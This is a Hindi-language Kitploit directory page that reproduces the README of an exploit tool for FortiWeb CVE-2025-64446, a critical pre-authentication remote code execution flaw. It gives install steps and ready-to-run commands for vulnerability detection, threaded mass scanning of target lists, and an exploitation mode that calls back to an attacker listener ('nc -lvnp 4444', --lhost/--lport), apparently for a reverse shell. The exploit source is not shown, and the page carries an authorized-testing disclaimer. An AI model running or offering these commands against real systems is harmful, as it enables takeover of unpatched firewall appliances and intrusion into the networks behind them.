Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — FortiWeb CVE-2025-64446 भेद्यता के लिए सुरक्षा अनुसंधान उपकरण। उन्नत लॉगिंग, रीयल-टाइम मेट्रिक्स, प्रॉक्सी डिबगिंग और पेशेवर रिपोर्टिंग के साथ स्वचालित शोषण फ्रेमवर्क। इसमें पुनः प्रयास तर्क, मल्टी-थ्रेडिंग और कॉन्फ़िगर करने योग्य सेटिंग्स शामिल हैं। केवल अधिकृत सुरक्षा परीक्षण के लिए। CVSS 9.8 क्रिटिकल। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

रिपॉजिटरी देखें
142 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

FortiWeb CVE-2025-64446 भेद्यता के लिए सुरक्षा अनुसंधान उपकरण। उन्नत लॉगिंग, रीयल-टाइम मेट्रिक्स, प्रॉक्सी डिबगिंग और पेशेवर रिपोर्टिंग के साथ स्वचालित शोषण फ्रेमवर्क। इसमें पुनः प्रयास तर्क, मल्टी-थ्रेडिंग और कॉन्फ़िगर करने योग्य सेटिंग्स शामिल हैं। केवल अधिकृत सुरक्षा परीक्षण के लिए। CVSS 9.8 क्रिटिकल।

साझा करें

FortiWeb CVE-2025-64446 RCE एक्सप्लॉइट

Python License CVSS CVE Status Version

पेशेवर सुरक्षा अनुसंधान और भेद्यता मूल्यांकन ढांचा

स्थापना · त्वरित प्रारंभ · उपयोग · आर्किटेक्चर · CLI संदर्भ · कानूनी और नैतिक अस्वीकरण


अवलोकन

FortiWeb Research Tool एक Python मूल्यांकन ढांचा है जो CVE-2025-64446 का अधिकृत पता लगाने और विश्लेषण करने के लिए है — यह एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन समस्या है जो FortiWeb Web Application Firewall उपकरणों को प्रभावित करती है।

विशेषताविवरण
लेखकSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Critical)
वर्गप्रमाणीकरण बायपास + पाथ ट्रैवर्सल → मनमाना फ़ाइल अपलोड → RCE
प्रभावित7.6.7 / 7.8.7 / 8.0.2 से पहले के बिल्ड (आधिकारिक सलाह के अनुसार सत्यापित करें)
उपचारपैच किए गए FortiWeb रिलीज़ में अपग्रेड करें
भाषाPython 3.7+
प्रवेश बिंदुexploit.py

प्रमुख क्षमताएँ

मोडफ़्लैग(s)उद्देश्य
पहचान--detect-onlyगैर-शोषणकारी भेद्यता संकेतक
सुरक्षित / केवल-पठन--safe-modeपरिवर्तन करने वाले एक्सप्लॉइट चरणों को छोड़ें
बड़े पैमाने पर स्कैन--targets + --scan-modeसमानांतर मल्टी-टारगेट मूल्यांकन
एक्सप्लॉइटेशन--target + --lhostकेवल अधिकृत प्रयोगशालाओं में नियंत्रित श्रृंखला
ड्राई रन--dry-runपरिवर्तन लागू किए बिना प्रवाह का अभ्यास करें
रिपोर्टिंग--output-dirJSON + HTML एंगेजमेंट रिपोर्ट

भेद्यता सारांश

फ़ील्डमान
CVE IDCVE-2025-64446
CVSS स्कोर9.8 (Critical)
प्रभावसफल शोषण की स्थिति में पूर्ण सिस्टम से समझौता
समाधान7.6.7, 7.8.7, 8.0.2, या बाद के संस्करण में अपग्रेड करें

एंगेजमेंट स्कोपिंग से पहले Fortinet PSIRT से प्रभावित/फिक्स किए गए संस्करणों की हमेशा पुष्टि करें।


📸 स्क्रीनशॉट

उपयोगस्कैन परिणाम
डैशबोर्डस्कैन परिणाम
HTML आउटपुट
टर्मिनल आउटपुट

स्थापना

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

निर्भरताएँ

पैकेजभूमिका
requests, urllib3HTTP क्लाइंट
rich, colorama, tqdmटर्मिनल UI और प्रगति
pyyamlconfig.yaml लोडिंग

वैकल्पिक (डेव): pytest, black, flake8, mypy, python-dotenv — requirements.txt देखें।


त्वरित प्रारंभ

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

नोट: एक्सप्लॉइटेशन मोड को --lhost की आवश्यकता होती है। जब आप पूर्ण श्रृंखला नहीं चलाना चाहते तो --detect-only या --safe-mode का उपयोग करें।


उपयोग गाइड

पहचान मोड

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

पहचान मोड पहुंच-क्षमता, संस्करण संकेत, API एक्सपोज़र, पाथ-ट्रैवर्सल संकेतक, ऑथ-बायपास सिग्नल और अपलोड-एंडपॉइंट पहुंच का मूल्यांकन करता है। इन संकेतकों के आधार पर जोखिम को Critical / High / Medium / Low के रूप में वर्गीकृत किया जाता है।

बड़े पैमाने पर स्कैनिंग

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager थ्रेड पूल के माध्यम से FortiWebScanner वर्कर चलाता है, एक Rich सारांश तालिका प्रिंट करता है, और scan_report.json / scan_report.html लिखता है।

एक्सप्लॉइटेशन मोड (केवल अधिकृत प्रयोगशालाओं में)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

कॉन्फ़िगरेशन फ़ाइल

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

CLI फ़्लैग YAML से लोड किए गए मानों को ओवरराइड करते हैं।


आर्किटेक्चर

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
घटकज़िम्मेदारी
FortiWebScannerपहुंच-क्षमता, संस्करण, CVE संकेतक जाँच
ScannerManagerसमानांतर स्कैन, JSON/HTML रोलअप, सारांश तालिका
FortiWebExploitकॉन्फ़िग-संचालित सत्र, रीट्राइ, मेट्रिक्स, रिपोर्ट, वैकल्पिक एक्सप्लॉइट पथ
LogManagerसंरचित फ़ाइल लॉगिंग + रंगीन कंसोल

उच्च-स्तरीय सिंगल-टारगेट प्रवाह:

  1. बैनर / लॉगिंग सेटअप
  2. पहुंच-क्षमता और संस्करण जाँच
  3. संकेतक जाँच (या जब डिटेक्ट/सेफ मोड में न हों तो पूर्ण श्रृंखला)
  4. reports/ के अंतर्गत JSON + HTML रिपोर्ट
  5. जहाँ लागू हो सफाई

विशेषताएँ

पहचान

टूल डाउनलोड करें